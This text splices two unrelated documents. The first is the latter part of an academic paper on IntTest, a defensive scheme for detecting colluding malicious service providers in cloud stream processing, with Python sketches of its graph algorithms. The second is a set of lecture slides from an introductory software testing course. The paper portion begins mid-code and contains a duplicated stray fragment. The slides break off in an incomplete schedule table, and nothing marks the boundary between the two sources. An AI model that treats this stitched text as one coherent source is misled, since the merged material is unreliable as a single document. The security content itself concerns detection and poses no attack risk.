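    nodes = sorted({v for e in edges for v in e})
    for k in range(len(nodes) + 1):
        for cand in combinations(nodes, k):
            cover = set(cand)
            if all(a in cover or b in cover for a, b in edges):
                return cover
    return set()

# Edge set loosely modeled on Figure 3(b): p2 conflicts with p1, p3, p4,
# and p1 also conflicts with p5; {p2, p5} (size 2) is one minimum cover.
example_edges = [("p1", "p2"), ("p2", "p3"), ("p2", "p4"), ("p1", "p5")]
```

On `example_edges` the cover size is 2, so Proposition 1 yields a lower bound of two malicious service providers, matching the Figure 3(b) discussion.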
We now define the residual inconsistency graph for a node $p_i$ as follows.
Definition 5: The residual inconsistency graph $G'_p$ of a node $p$ is the inconsistency graph obtained from $G$ by removing the node $p$, its neighbors, and all links adjacent to them.
For example, Figure 4 shows the residual inconsistency graph of node $p_2$. Based on the lower bound on the number of malicious service providers and Definition 5, we have the following proposition for pinpointing a subset of malicious nodes.
Proposition 2: Given the global inconsistency graph $G$ and the upper bound $K$ on the number of malicious service providers, a node $p$ must be a malicious service provider if
$$|N_p| + |C_{G'_p}| > K$$ (1)
where $|N_p|$ is the number of neighbors of $p$, and $|C_{G'_p}|$ is the size of the minimum vertex cover of the residual inconsistency graph $G'_p$ obtained after removing $p$ and its neighbors from $G$.
For example, in Figure 3(b), suppose we know the number of malicious service providers is no more than 2. Let us examine the malicious node $p_2$ first. After we remove $p_2$ and its neighbors $p_1$, $p_3$, and $p_4$ from the inconsistency graph, the residual inconsistency graph will be a graph without any link. Thus, its minimum vertex cover is 0. Since $p_2$ has three neighbors, we have $3 + 0 > 2$. Thus, $p_2$ is malicious. Let us now check out the benign node $p_1$. After removing $p_1$ and its two neighbors $p_2$ and $p_5$, the residual inconsistency graph will be a graph without any link and its minimum vertex cover should be 0. Since $p_1$ has two neighbors, Equation 1 does not hold. We will not pinpoint $p_1$ as malicious in this step.
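Proposition 2's test can be sketched directly, with a small exhaustive vertex-cover helper that is only suitable for example-sized graphs. The edge set in the test mirrors the Figure 3(b) example, where $p_2$'s neighbors are $p_1$, $p_3$, $p_4$ and $p_1$'s neighbors are $p_2$ and $p_5$:

```python
from itertools import combinations

def min_cover_size(edges):
    # exhaustive minimum vertex cover size (examples only; NP-hard in general)
    nodes = sorted({v for e in edges for v in e})
    for k in range(len(nodes) + 1):
        for cand in combinations(nodes, k):
            cover = set(cand)
            if all(a in cover or b in cover for a, b in edges):
                return k
    return 0

def is_pinpointed_malicious(node, edges, K):
    """Proposition 2: node p is pinpointed when |N_p| + |C_{G'_p}| > K,
    with G'_p the residual graph after deleting p and its neighbors."""
    neighbors = {b if a == node else a for a, b in edges if node in (a, b)}
    removed = neighbors | {node}
    residual = [e for e in edges if not (set(e) & removed)]
    return len(neighbors) + min_cover_size(residual) > K
```

With $K = 2$, this flags $p_2$ (three neighbors plus an empty residual cover, $3 + 0 > 2$) but not $p_1$ ($2 + 0 \not> 2$), reproducing the worked example above.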
Note that benign service providers that do not serve same functions with malicious ones will be isolated nodes in the inconsistency graph, since they will not be involved in any inconsistency links. For example, in Figure 5, nodes $p_4$, $p_5$, $p_6$ and $p_7$ are isolated nodes since they are not associated with any inconsistency links in the global inconsistency graph. Thus, we can remove these nodes from the inconsistency graph without affecting the computation of the minimum vertex cover.
We now describe how to estimate the upper bound of the number of malicious service providers $K$. Let $N$ denote the total number of service providers in the system. Since we assume that the total number of malicious service providers is less than that of benign ones, the number of malicious service providers should be no more than $\lfloor N/2 \rfloor$. According to Proposition 1, the number of malicious service providers should be no less than the size of the minimum vertex cover $|C_G|$ of the global inconsistency graph. Thus, $K$ is bounded below by $|C_G|$ and above by $\lfloor N/2 \rfloor$. We then use an iterative algorithm to tighten the bound of $K$. We start from the lower bound of $K$ and compute the set of malicious nodes, as described by Proposition 2, denoted by $\Omega$. Then we gradually increase $K$ by one each time. For each specific value of $K$, we get a set of malicious nodes. With a larger $K$, fewer nodes can satisfy $|N_x|+|C_{G'_x}| > K$, which causes the set $\Omega$ to shrink. When $\Omega = \emptyset$, we stop increasing $K$, since any larger $K$ cannot yield more malicious nodes. Intuitively, when $K$ is large, fewer nodes may satisfy Equation 1, so we may only identify a small subset of malicious nodes. In contrast, when $K$ is small, more nodes may satisfy Equation 1, which may mistakenly pinpoint benign nodes as malicious. To avoid false positives, we want to pick a large enough $K$ that pinpoints a set of truly malicious service providers.
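The bound-tightening loop can be sketched as follows, taking the Proposition 1 lower bound and the $\lfloor N/2 \rfloor$ upper bound as inputs and treating the Proposition 2 check as a supplied callable; returning the result for the largest $K$ that still flags some node is our reading of "pick a large enough $K$":

```python
def tighten_K(pinpoint, k_low, k_high):
    """Iterative K estimation (sketch). `pinpoint(K)` is assumed to return
    the set of nodes satisfying Equation 1 for a given K. Starting from the
    lower bound, raise K until no node is flagged, and report the last
    non-empty pinpointed set together with the K that produced it."""
    last_k, last_set = k_low, pinpoint(k_low)
    for K in range(k_low + 1, k_high + 1):
        omega = pinpoint(K)
        if not omega:
            break              # a larger K cannot flag more nodes
        last_k, last_set = K, omega
    return last_k, last_set
```

The stub `pinpoint` in the test (flagging nodes whose "score" exceeds $K$) just illustrates the monotone shrinking of $\Omega$ as $K$ grows.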
**Step 3: Combining consistency and inconsistency graph analysis results.** Let $G_i$ be the consistency graph generated for service function $f_i$, and $G$ be the global inconsistency graph. Let $M_i$ denote the list of suspicious nodes obtained by analyzing the per-function consistency graph $G_i$ (i.e., nodes belonging to minority cliques), and $\Omega$ denote the list of suspicious nodes obtained by analyzing the global inconsistency graph $G$, given a particular upper bound $K$ on the number of malicious nodes. We examine per-function consistency graphs one by one. Let $\Omega_i$ denote the subset of $\Omega$ that serves function $f_i$. If $\Omega_i \cap M_i \neq \emptyset$, we add the nodes in $M_i$ to the identified malicious node set. The idea is that since the majority of nodes serving function $f_i$ have successfully excluded the malicious nodes in $\Omega_i$, we can trust their decision on proposing $M_i$ as malicious nodes. Pseudo-code of our algorithm can be found in section 1 of the online supplemental material.
For example, Figure 6 shows both the per-function consistency graphs and the global inconsistency graph. If the upper bound of the malicious nodes $K$ is set to 4, the inconsistency graph analysis will capture the malicious node $p_8$ but will miss the malicious node $p_9$. The reason is that $p_9$ only has three neighbors and the minimum vertex cover for the residual inconsistency graph after removing $p_9$ and its three neighbors is 1. Note that we will not pinpoint any benign node as malicious according to Proposition 2. For example, the benign node $p_1$ has two neighbors, and the minimum vertex cover for the residual graph after removing $p_1$ and its two neighbors $p_8$ and $p_9$ will be 0 since the residual graph does not include any link. However, by checking the consistency graph of function $f_1$, we find that $\Omega_1 = \{p_8\}$ overlaps with the minority clique $M_1 = \{p_8, p_9\}$. We then infer that $p_9$ should be malicious too.
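Step 3's combination rule reduces to a few lines (a sketch; the data shapes are our assumption). In the Figure 6 example, the inconsistency analysis captures $p_8$, and its overlap with the minority clique $M_1 = \{p_8, p_9\}$ pulls in $p_9$:

```python
def combine(omega, minority_cliques, providers_by_fn):
    """Step 3 (sketch): start from the inconsistency-graph verdict omega;
    for each function f_i, if the members of omega serving f_i overlap the
    minority-clique set M_i, trust the function's majority and add all of
    M_i to the malicious set."""
    malicious = set(omega)
    for fn, M_i in minority_cliques.items():
        omega_i = omega & providers_by_fn[fn]   # subset of omega serving fn
        if omega_i & M_i:
            malicious |= M_i
    return malicious
```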
Note that even if we have an accurate estimation of the number of malicious nodes, the inconsistency graph analysis scheme may not identify all malicious nodes. However, our integrated algorithm can pinpoint more malicious nodes than the inconsistency-graph-only algorithm.
#### 3.3 Result Auto-Correction
IntTest can not only pinpoint malicious service providers but also automatically correct corrupted data processing results to improve the result quality of the cloud data processing service, as illustrated in Figure 7. Without our attestation scheme, once an original data item is manipulated by any malicious node, the processing result of this data item can be corrupted, which results in degraded result quality. IntTest leverages the attestation data and the malicious node pinpointing results to detect and correct compromised data processing results.
Specifically, after the portal node receives the result $f(d)$ of the original data $d$, it checks whether $d$ has been processed by any malicious node pinpointed by our algorithm. We label the result $f(d)$ as a “suspicious result” if $d$ has been processed by any pinpointed malicious node. Next, the portal node checks whether $d$ has been chosen for attestation. If $d$ was selected for attestation, we check whether any attestation copy of $d$ traversed only benign nodes. If so, we use the result of that attestation data to replace $f(d)$. For example, in Figure 7, the original data $d$ is processed by the pinpointed malicious node $s_6$ while one of its attestation copies $d''$ is processed only by benign nodes. The portal node will use the attestation result $f(d'')$ to replace the original result, which may be corrupted if $s_6$ cheated on $d$.
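The auto-correction decision can be sketched as follows (paths and names are illustrative, not from the paper's implementation):

```python
def corrected_result(original_result, original_path, attested, pinpointed):
    """Sketch of result auto-correction. `original_path` lists the nodes
    that processed the original data; `attested` is a list of
    (attestation_path, result) pairs for its replayed copies; `pinpointed`
    is the set of nodes flagged as malicious."""
    if not set(original_path) & pinpointed:
        return original_result        # result never touched a flagged node
    for alt_path, alt_result in attested:
        if not set(alt_path) & pinpointed:
            return alt_result         # clean attestation copy found
    return original_result            # suspicious, but no clean copy exists
```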
Although our algorithm cannot guarantee zero false positives when there are multiple independent colluding groups, it is difficult for attackers to escape our detection in that setting, since attackers will have inconsistency links not only with benign nodes but also with other groups of malicious nodes. Additionally, even if colluding attackers evade detection, our approach limits the damage they can cause in two ways. First, our algorithm limits the number of functions that can be simultaneously attacked. Second, our approach ensures that a single attacker cannot participate in compromising an unlimited number of service functions without being detected.
### 5 Experimental Evaluation
In this section, we present the experimental evaluation of the IntTest system. We first describe our experimental setup. We then present and analyze the experimental results.
#### 5.1 Experiment Setup
We have implemented a prototype of the IntTest system and tested it on NCSU’s virtual computing lab (VCL) [28], a production cloud infrastructure that operates in a similar way to Amazon EC2 [29]. We add portal nodes into VCL and deploy the IBM System S stream processing middleware [8], [30] to provide a distributed data stream processing service. System S is an industry-strength high performance stream processing platform that can analyze massive volumes of continuous data streams and scale to hundreds of processing elements (PEs) for each application. In our experiments, we used 10 VCL nodes running 64-bit CentOS 5.2. Each node runs multiple virtual machines (VMs) on top of Xen 3.0.3.
The dataflow processing application we use in our experiments is adapted from the sample applications provided by System S. This application takes stock information as input, performs windowed aggregation on the input stream according to the specified company name and then performs calculations on the stock data. We use a trusted portal node to accept the input stream, perform comprehensive integrity attestation on the PEs and analyze the attestation results. The portal node constructs one consistency graph for each service function and one global inconsistency graph across all service providers in the system.
For comparison, we have also implemented three alternative integrity attestation schemes: 1) the Full-Time Majority Voting (FTMV) scheme, which employs all functionally-equivalent service providers at all time for attestation and determines malicious service providers through majority voting on the processing results; 2) the Part-Time Majority Voting (PTMV) scheme, which employs all functionally-equivalent service providers over a subset of input data for attestation and determines malicious service providers using majority voting; and 3) the RunTest scheme [26], which pinpoints malicious service providers by analyzing only per-function consistency graphs, labeling those service providers that are outside of all cliques of size larger than $\lfloor k/2 \rfloor$ as malicious, where $k$ is the number of service providers.
providers that participate in this service function. Note that AdapTest [27] uses the same attacker pinpointing algorithm as RunTest; thus, AdapTest has the same detection accuracy as RunTest but with less attestation overhead.
Three major metrics for evaluating our scheme are detection rate, false alarm rate, and attestation overhead. We calculate the detection rate, denoted by $AD$, as the number of pinpointed malicious service providers over the total number of malicious service providers that have misbehaved at least once during the experiment. During runtime, the detection rate should start from zero and increase as more malicious service providers are detected. False alarm rate $AF$ is defined as $N_{fp}/(N_{fp} + N_{tn})$, where $N_{fp}$ denotes false alarms corresponding to the number of benign service providers that are incorrectly identified as malicious; $N_{tn}$ denotes true negatives corresponding to the number of benign service providers that are correctly identified as benign. The attestation overhead is evaluated by both the number of duplicated data tuples that are redundantly processed for service integrity attestation and the extra dataflow processing time incurred by the integrity attestation.
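For concreteness, the two accuracy metrics can be computed as follows (a sketch over sets of provider identifiers):

```python
def detection_rate(pinpointed, misbehaved):
    """AD: pinpointed malicious providers over all providers that
    misbehaved at least once during the experiment."""
    return len(pinpointed & misbehaved) / len(misbehaved)

def false_alarm_rate(pinpointed, benign):
    """AF = Nfp / (Nfp + Ntn); the denominator equals the whole benign
    population, since every benign provider is either a false positive
    or a true negative."""
    return len(pinpointed & benign) / len(benign)
```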
While evaluating the IntTest system, we assume that the colluding attackers know our attestation scheme and adopt their best strategy. According to the security analysis in Section 4, the best way for attackers to escape detection is to attack as a colluding group. Colluding attackers can take different strategies. They may attack conservatively by first attacking those service functions with a smaller number of service providers, where they can easily take the majority, assuming they know the number of participating service providers for each service function. Alternatively, they may attack aggressively by attacking service functions at random, assuming they do not know the number of participating service providers. We investigate the impact of these attack strategies on our scheme in terms of both detection rate and false alarm rate.
#### 5.2 Results and Analysis
We first investigate the accuracy of our scheme in pinpointing malicious service providers. Figure 8(a) compares our scheme with the other alternative schemes (i.e., FTMV, PTMV, RunTest) when malicious service providers aggressively attack different numbers of service functions. In this set of experiments, we have 10 service functions and 30 service providers. The number of service providers in each service function randomly ranges in [1, 8]. Each benign service provider provides two randomly selected service functions. The data rate of the input stream is 300 tuples per second. We set 20% of the service providers as malicious. After the portal receives the processing result of a new data tuple, it randomly decides whether to perform data attestation. Each tuple has a 0.2 probability of being attested (i.e., attestation probability $P_{u} = 0.2$), and two attestation data replicas are used (i.e., the number of total data copies including the original data is $r = 3$). Each experiment is repeated three times. We report the average detection rate and false alarm rate achieved by the different schemes. Note that RunTest can achieve the same detection accuracy results as the majority voting based schemes after the randomized probabilistic attestation covers all attested service providers and discovers the majority clique [26]. In contrast, IntTest comprehensively examines both per-function consistency graphs and the global inconsistency graph to make the final pinpointing decision. We observe that IntTest can achieve a much higher detection rate and a lower false alarm rate than the other alternatives. Moreover, IntTest can achieve better detection accuracy when malicious service providers attack more functions. We also observe that when malicious service providers attack aggressively, our scheme can detect them even though they attack a low percentage of service functions.
Figure 8(b) shows the malicious service provider detection accuracy under the conservative attack scenario. All other experiment parameters are kept the same as in the previous experiments. The results show that IntTest consistently achieves a higher detection rate and a lower false alarm rate than the other alternatives. In the conservative attack scenario, as shown in Figure 8(b), the false alarm rate of IntTest first increases when a small percentage of service functions are attacked and then drops to zero quickly as more service functions are attacked. This is because when attackers only attack a few service functions where they can take the majority, they can hide themselves from our detection scheme while tricking our algorithm into labeling benign service providers as malicious. However, if they attack more service functions, they can be detected, since they incur more inconsistency links with benign service providers in the global inconsistency graph. Note that majority voting based schemes can also detect malicious attackers if the attackers fail to take the majority.
We now evaluate the effectiveness of our result auto-correction scheme. We compare the result quality with and without auto-correction, and also investigate the impact of the attestation probability. Figure 10(a) and Figure 10(b) show the result quality under non-colluding attacks with 20% malicious nodes and colluding attacks with 40% malicious nodes, respectively. We vary the attestation probability from 0.2 to 0.4. In both scenarios, IntTest achieves significant result quality improvement without incurring any extra overhead beyond the attestation overhead. IntTest achieves a higher result quality improvement under a higher node misbehaving probability. This is because IntTest can detect the malicious nodes earlier, so that it can correct more compromised data using the attestation data.
Figure 11 compares the overhead of the four schemes in terms of the percentage of attestation traffic relative to the original data traffic (i.e., the total number of duplicated data tuples used for attestation over the number of original data tuples). The data rate is 300 tuples per second. Each experiment run processes 20,000 data tuples. IntTest and RunTest incur less than half the attestation traffic of PTMV, and an order of magnitude less attestation overhead than FTMV. Additional overhead analysis details are available in section 3 of the online supplemental material.
### 6 Limitation Discussion
Although we have shown that IntTest can achieve better scalability and higher detection accuracy than existing schemes, IntTest still has a set of limitations that require further study. A detailed limitation discussion can be found in Section 4 of the online supplementary material. We now summarize the limitations of our approach. First, malicious attackers can still escape detection if they only attack a few service functions, take the majority in all the compromised service functions, and have fewer inconsistency links than benign service providers. However, IntTest can effectively limit the attack scope and make it difficult to attack popular service functions. Second, IntTest assumes the attested services are input-deterministic, where benign services return the same or similar results (as defined by a distance function) for the same input. Thus, IntTest cannot support service functions whose results vary significantly based on random numbers or timestamps.
7 CONCLUSION
In this paper, we have presented the design and implementation of IntTest, a novel integrated service integrity attestation framework for multi-tenant software-as-a-service cloud systems. IntTest employs randomized replay-based consistency checks to verify the integrity of distributed service components without imposing high overhead on the cloud infrastructure. IntTest performs integrated analysis over both consistency and inconsistency attestation graphs to pinpoint colluding attackers more efficiently than existing techniques. Furthermore, IntTest provides result auto-correction to automatically correct compromised results and improve result quality. We have implemented IntTest and tested it on a commercial data stream processing platform running inside a production virtualized cloud computing infrastructure. Our experimental results show that IntTest achieves higher pinpointing accuracy than existing alternative schemes. IntTest is lightweight and imposes little performance impact on the data processing services running inside the cloud computing infrastructure.
ACKNOWLEDGMENTS
This work was sponsored in part by U.S. Army Research Office (ARO) under grant W911NF-08-1-0105 managed by NCSU Secure Open Systems Initiative (SOSI), NSF CNS-0915567, and NSF IIS-0430166. Any opinions expressed in this paper are those of the authors and do not necessarily reflect the views of the ARO, NSF or U.S. Government.
Daniel J. Dean is a PhD student in the Department of Computer Science at North Carolina State University. He received a BS and MS in computer science from Stony Brook University, New York in 2007 and 2009 respectively. He has interned with NEC Labs America in the summer of 2012 and is a student member of the IEEE.
Yongmin Tan is a software engineer in MathWorks. He currently focuses on modeling distributed systems for Simulink. His general research interests include reliable distributed systems and cloud computing. He received his PhD degree in 2012 from the Department of Computer Science, North Carolina State University. He received his BE degree and ME degree, both in Electrical Engineering from Shanghai Jiaotong University in 2005 and 2008 respectively. He has interned with NEC Labs America in 2010. He is a recipient of the best paper award from ICDCS 2012.
Xiaohui Gu is an assistant professor in the Department of Computer Science at the North Carolina State University. She received her PhD degree in 2004 and MS degree in 2001 from the Department of Computer Science, University of Illinois at Urbana-Champaign. She received her BS degree in computer science from Peking University, Beijing, China in 1999. She was a research staff member at IBM T. J. Watson Research Center, Hawthorne, New York, between 2004 and 2007. She received ILLIAC fellowship, David J. Kuck Best Master Thesis Award, and Saburo Muroga Fellowship from University of Illinois at Urbana-Champaign. She also received the IBM Invention Achievement Awards in 2004, 2006, and 2007. She has filed eight patents, and has published more than 50 research papers in international journals and major peer-reviewed conference proceedings. She is a recipient of NSF Career Award, four IBM Faculty Awards 2008, 2009, 2010, 2011, and two Google Research Awards 2009, 2011, a best paper award from IEEE CNSM 2010, and NCSU Faculty Research and Professional Development Award. She is a Senior Member of IEEE.
Ting Yu is an Associate Professor in the Department of Computer Science, North Carolina State University. He obtained his PhD from the University of Illinois at Urbana-Champaign in 2003, MS from the University of Minnesota in 1998, and BS from Peking University in 1997, all in computer science. His research is in security, with a focus on data security and privacy, trust management and security policies. He is a recipient of the NSF CAREER Award.
LTAT.05.006: Software Testing
Lecture 01: Introduction to Software Testing
Spring 2020
Dietmar Pfahl
email: dietmar.pfahl@ut.ee
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
2012: Knight Capital loses 440M USD
- August 1st: new trading software installed
- Administrator forgets to deploy it on one of the eight server nodes
- New code repurposed a flag previously used for testing scenarios
- On that one server node, the old trading algorithm interprets the flag differently and starts buying and selling 100 different stocks randomly without human verification
- NYSE has to suspend trading of several stocks
- Knight Capital loses 440 million USD in only 30 minutes before the system is suspended
- Investors have to raise 400 million USD to rescue the company
#1 Explosion of Ariane 5, 1996
(Cartoon: “Oh, well! I bet that code never gets used, anyway.” — Error! Ariane 5 explodes.)
Uber’s fatal self-driving car crash in Arizona, 2018
“The fatal crash that killed pedestrian Elaine Herzberg in Tempe, Arizona, in March occurred because of a software bug in Uber's self-driving car technology (...). According to two anonymous sources (...), Uber's sensors did, in fact, detect Herzberg as she crossed the street with her bicycle. Unfortunately, the software classified her as a "false positive" and decided it didn't need to stop for her.
Distinguishing between real objects and illusory ones is one of the most basic challenges of developing self-driving car software. Software needs to detect objects like cars, pedestrians, and large rocks in its path and stop or swerve to avoid them. However, there may be other objects—like a plastic bag in the road or a trash can on the sidewalk—that a car can safely ignore. Sensor anomalies may also cause software to detect apparent objects where no objects actually exist.
Software designers face a basic tradeoff here. If the software is programmed to be too cautious, the ride will be slow and jerky, as the car constantly slows down for objects that pose no threat to the car or aren't there at all. Tuning the software in the opposite direction will produce a smooth ride most of the time—but at the risk that the software will occasionally ignore a real object.”
List of SW Problems from Guru99 /1
- In April 2015, the Bloomberg terminal in London crashed due to a software glitch, affecting more than 300,000 traders on financial markets. It forced the government to postpone a 3bn pound debt sale.
- Nissan had to recall over 1 million cars from the market due to a software failure in the airbag sensory detectors. Two accidents have been reported due to this software failure.
- Starbucks was forced to close about 60 percent of its stores in the U.S. and Canada due to a software failure in its POS system. At one point stores served coffee for free as they were unable to process transactions.
List of SW Problems from Guru99 /2
• Some of Amazon’s third-party retailers saw their product prices reduced to 1p due to a software glitch. They were left with heavy losses.
• Vulnerability in Windows 10: this bug enables users to escape from security sandboxes through a flaw in the win32k system.
• In 2015, fighter plane F-35 fell victim to a software bug, making it unable to detect targets correctly.
• In May 1996, a software bug caused the bank accounts of 823 customers of a major U.S. bank to be credited with 920 million US dollars.
List of SW Problems from Guru99 /3
- In April of 1999, a software bug caused the failure of a $1.2 billion military satellite launch, the costliest accident in history
- A China Airlines Airbus A300 crashed due to a software bug on April 26, 1994, killing 264 people
- In 1985, Canada's Therac-25 radiation therapy machine malfunctioned due to a software bug and delivered lethal radiation doses to patients, leaving 3 people dead and 3 others critically injured.
What is Software Testing?
What is Software Testing? (Static & Dynamic)
Confirm quality *(pass-test)*
vs.
Find defects *(fail-test)*
Cost of Testing / Cost of not Testing
2014 industrial survey of 1543 executives from 25 countries:
• Testing and quality assurance of software-intensive systems accounts for roughly 26% of IT budgets [1]
2013 study by researchers at the University of Cambridge:
• Global cost of locating and removing bugs from software has risen to $312 billion annually and it makes up half of the development time of the average project [2].
Sources:
Recall Exercise: A Pen
- Quality?
- Testing?
Software Quality – Definition
- **Software quality is the degree of** conformance to explicit or implicit requirements and expectations
Explanation:
- *Explicit*: clearly defined and documented
- *Implicit*: not clearly defined and documented but indirectly suggested
- *Requirements*: business/product/software requirements
- *Expectations*: mainly end-user expectations
Software Product Quality Model – ISO 25010 Standard
Safety ?
Software Product Quality Model
– ISO 25010 Standard
Software Quality Assurance (SQA)
versus
Software Quality Control (SQC)
Software Quality Assurance (SQA)
- SQA is a set of activities for ensuring quality in software engineering processes (that ultimately result in quality in software products).
It includes the following activities:
- Process definition
- Process implementation
- Auditing
- Training
Processes could be:
- Software Development Methodology
- Project Management
- Configuration Management
- Requirements Development/Management
- Estimation
- Software Design
- Testing
- ...
Software Quality Control (SQC)
- SQC is a set of activities for ensuring quality in software products.
It includes the following activities:
- Reviews
- Testing
(Dynamic) Testing:
- Unit Testing
- Integration Testing
- System Testing
- Acceptance Testing
Reviews:
- Requirement Review
- Design Review
- Code Review
- Deployment Plan Review
- Test Plan Review
- Test Cases Review
Verification versus Validation
Validation versus Verification
Requirements Backlog
(e.g., User Stories)
Work Product
Work Product
...
Work Product
Development Process
End Product
(i.e., the Software that is delivered/deployed)
Validation versus Verification
Requirements Backlog
(e.g., User Stories)
Work Product
Work Product
...
Development Process
End Product
(i.e., the Software that is delivered/deployed)
Validation versus Verification
Requirements Backlog (e.g., User Stories) → Work Product → Work Product → Work Product → End Product (i.e., the Software that is delivered/deployed)
Development Process
Verification vs. Validation
Source: SEI at CMU, Donald Firesmith
Verification
Definition
• The process of evaluating work-products (not the actual final product) of a development phase to determine whether they meet the specified requirements for that phase.
Objective
• To ensure that the product is being built according to the requirements and design specifications. In other words, to ensure that work products meet their specified requirements.
Question
• Are we building the product right?
Validation
Definition
• The process of evaluating software during or at the end of the development process to determine whether it satisfies specified (or implicit) business requirements.
Objective
• To ensure that the product actually meets the user’s needs, and that the requirements were correct in the first place. In other words, to demonstrate that the product fulfills its intended use when placed in its intended environment.
Question
• Are we building the right product?
Evaluation Items:
- User requirements, Final product/software
Activities:
- Requirements review, Acceptance testing
Test Complexity – Quiz
Example:
- 30 variables, 2 levels
- Test all combinations
How long does it take to test, if 5 tests/sec can be executed automatically?
Answer choices:
1. Less than 10 sec
2. Less than 1 min
3. Less than 1 hour
4. Less than 1 day
5. Less than 1 year
6. More than 1 year
Test Complexity
Example:
- 30 variables, 2 levels
-> $2^{30} \approx 10^9$
combinations to test
- 5 tests/second ->
214748364.8 sec or
6.8 years of testing!
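The arithmetic behind the quiz answer can be checked in a few lines. A minimal sketch (the class and method names are ours, not from the course material):

```java
// Rough cost of exhaustively testing 30 two-level (boolean) variables
// at 5 automated test executions per second, as on the slide.
public class TestEffort {
    public static long combinations(int variables, int levels) {
        long total = 1;
        for (int i = 0; i < variables; i++) {
            total *= levels;                      // levels^variables
        }
        return total;
    }

    public static double secondsNeeded(long tests, double testsPerSecond) {
        return tests / testsPerSecond;
    }

    public static void main(String[] args) {
        long tests = combinations(30, 2);          // 2^30 = 1,073,741,824
        double seconds = secondsNeeded(tests, 5.0); // 214,748,364.8 s
        double years = seconds / (365.0 * 24 * 3600);
        System.out.printf("%d tests, %.1f s, %.1f years%n", tests, seconds, years);
    }
}
```

Even this tiny configuration space makes exhaustive testing infeasible, which is why later lectures cover combinatorial test selection.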
How to test when correct SW output is unknown?
Scientific calculations
Artificial intelligence
Simulation and modelling
How to test when correct SW output is unknown?
Idea: Metamorphic Testing
Example of Metamorphic Testing: Google Maps Navigator
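The slides do not spell out the Maps relation, so here is a minimal metamorphic-testing sketch using a relation we chose ourselves, sin(x) = sin(π − x): when the exact expected output is unknown, we check a relation between two runs instead of comparing against a single expected value.

```java
// Metamorphic testing sketch: we may not know the exact value of
// sin(x) for an arbitrary x, but the relation sin(x) == sin(PI - x)
// must hold for every x, so it can serve as a pseudo-oracle.
public class MetamorphicSine {
    public static boolean relationHolds(double x) {
        double source = Math.sin(x);              // source test case
        double followUp = Math.sin(Math.PI - x);  // follow-up test case
        return Math.abs(source - followUp) < 1e-9;
    }

    public static void main(String[] args) {
        java.util.Random rng = new java.util.Random(42);
        for (int i = 0; i < 1000; i++) {
            double x = rng.nextDouble() * 100;    // arbitrary inputs
            if (!relationHolds(x)) {
                throw new AssertionError("Relation violated at x = " + x);
            }
        }
        System.out.println("Metamorphic relation held for 1000 random inputs");
    }
}
```

For a navigator the analogous idea would be relations such as "the route A→B and the route B→A should have similar lengths", checked over many generated inputs.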
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
Course Information/Overview
- **Level:** Course at bachelor's level (in English), 2nd year
- **Credits:** 6 ECTS
- **Prerequisite:**
- Compulsory: MTAT.03.094/LTAT.05.003 Software Engineering (6 ECTS)
- Recommended: MTAT.03.130 Object-oriented Programming (6 ECTS)
- **Work load:**
- Lectures (incl. practical work): 64 person-hours – incl. lab and exam sessions
- Independent work (outside classroom): 92 person-hours
- **Assessment:**
- 11 Homework Assignments (work in pairs) – 60% of grade (~5 ph per lab = 55 ph)
- 10 Quizzes (individual) – 10% of grade (~10 ph)
- Exam (written) – 30% of grade (~27 ph)
- **Grade scale:** A (90%+), B(80%+), C(70%+), D(60%+), E(50%+), F
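The assessment weights combine into a final score as follows; a minimal sketch assuming exactly the weights and thresholds from this slide (class and method names are ours):

```java
// Weighted final grade per the slide: homework 60%, quizzes 10%,
// exam 30%; letter thresholds A(90+), B(80+), C(70+), D(60+), E(50+), F.
public class GradeCalc {
    public static double finalScore(double hwPct, double quizPct, double examPct) {
        return 0.6 * hwPct + 0.1 * quizPct + 0.3 * examPct;
    }

    public static char letter(double score) {
        if (score >= 90) return 'A';
        if (score >= 80) return 'B';
        if (score >= 70) return 'C';
        if (score >= 60) return 'D';
        if (score >= 50) return 'E';
        return 'F';
    }

    public static void main(String[] args) {
        double s = finalScore(85, 90, 70);  // 0.6*85 + 0.1*90 + 0.3*70 = 81.0
        System.out.println(s + " -> " + letter(s));
    }
}
```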
Letter Grades
- **A** - An excellent performance, clearly outstanding. The candidate demonstrates excellent judgement and a high degree of independent thinking.
- **B** - A very good performance. The candidate demonstrates sound judgement and a very good degree of independent thinking.
- **C** - A good performance in most areas. The candidate demonstrates a reasonable degree of judgement and independent thinking in the most important areas.
- **D** - A satisfactory performance, but with significant shortcomings. The candidate demonstrates a limited degree of judgement and independent thinking.
- **E** - A performance that meets the minimum criteria, but no more. The candidate demonstrates a very limited degree of judgement and independent thinking.
- **F** - A performance that does not meet the minimum academic criteria. The candidate demonstrates an absence of both judgement and independent thinking.
ECTS recommended distribution:
A: 10% B: 25% C: 30% D: 25% E: 10%
ECTS = European Credit Transfer and Accumulation System
Lectures (Delta room 1021)
- Lecture 1 (13.02) – Introduction to Software Testing
- Lecture 2 (20.02) – Basic Black-Box Testing Techniques: Boundary Value Analysis & Equivalence Class Partitioning
- Lecture 3 (27.02) – BBT advanced: Combinatorial Testing
- Lecture 4 (05.03) – Basic White-Box Testing Techniques: Control-Flow Coverage
- Lecture 5 (12.03) – Test Lifecycle, Test Levels, Test Tools
- Lecture 6 (19.03) – BBT adv.: State-Transition, Metamorphic, Random Testing
- Lecture 7 (26.03) – BBT adv.: Exploratory Testing, Behaviour Testing
- Lecture 11 (23.04) – Defect Estimation / Test Documentation, Organisation and Process Improvement (Test Maturity Model)
- Lectures 12+13 (30.04 + 07.05) – Industry Guest Lectures (to be announced)
- Lecture 14 (14.05) – Exam Preparation
# Lectures / Labs (HW) / Quiz Schedule
<table>
<thead>
<tr>
<th>W24</th>
<th>W25</th>
<th>W26</th>
<th>W27</th>
<th>W28</th>
<th>W29</th>
<th>W30</th>
<th>W31</th>
<th>W32</th>
<th>W33</th>
<th>W34</th>
<th>W35</th>
<th>W36</th>
<th>W37</th>
</tr>
</thead>
<tbody>
<tr>
<td>Lec 1</td>
<td>Lec 2</td>
<td>Lec 3</td>
<td>Lec 4</td>
<td>Lec 5</td>
<td>Lec 6</td>
<td>Lec 7</td>
<td>Lec 8</td>
<td>Lec 9</td>
<td>Lec 10</td>
<td>Lec 11</td>
<td>Lec 12</td>
<td>Lec 13</td>
<td>Lec 14</td>
</tr>
<tr>
<td>HW 1</td>
<td>X</td>
<td>HW 2</td>
<td>X</td>
<td>HW 3</td>
<td>X</td>
<td>HW 4</td>
<td>X</td>
<td>HW 5</td>
<td>X</td>
<td>HW 6</td>
<td>X</td>
<td>HW 7</td>
